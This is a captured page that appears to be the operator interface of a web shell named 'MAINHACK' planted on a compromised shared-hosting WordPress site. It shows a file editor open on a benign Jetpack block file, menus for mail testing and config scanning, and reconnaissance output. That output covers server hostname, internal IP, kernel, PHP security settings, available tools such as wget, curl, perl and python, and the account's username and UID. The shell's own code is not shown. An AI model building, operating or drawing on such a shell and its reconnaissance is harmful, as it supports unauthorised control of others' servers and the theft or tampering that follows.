[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: conversation.php
<?php /** * Conversation Block. * * @since 9.3.0 * * @package automattic/jetpack */ namespace Automattic\Jetpack\Extensions\Conversation; use Automattic\Jetpack\Blocks; use Jetpack_Gutenberg; const FEATURE_NAME = 'conversation'; const BLOCK_NAME = 'jetpack/' . FEATURE_NAME; /** * Registers the block for use in Gutenberg * This is done via an action so that we can disable * registration if we need to. */ function register_block() { $deprecated = function_exists( 'gutenberg_get_post_from_context' ); $provides = $deprecated ? 'providesContext' : 'provides_context'; Blocks::jetpack_register_block( BLOCK_NAME, array( 'render_callback' => __NAMESPACE__ . '\render_block', $provides => array( 'jetpack/conversation-participants' => 'participants', 'jetpack/conversation-showTimestamps' => 'showTimestamps', ), ) ); } add_action( 'init', __NAMESPACE__ . '\register_block' ); /** * Conversation block registration/dependency declaration. * * @param array $attr Array containing the Conversation block attributes. * @param string $content String containing the Conversation block content. * * @return string */ function render_block( $attr, $content ) { Jetpack_Gutenberg::load_assets_as_required( FEATURE_NAME ); return $content; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129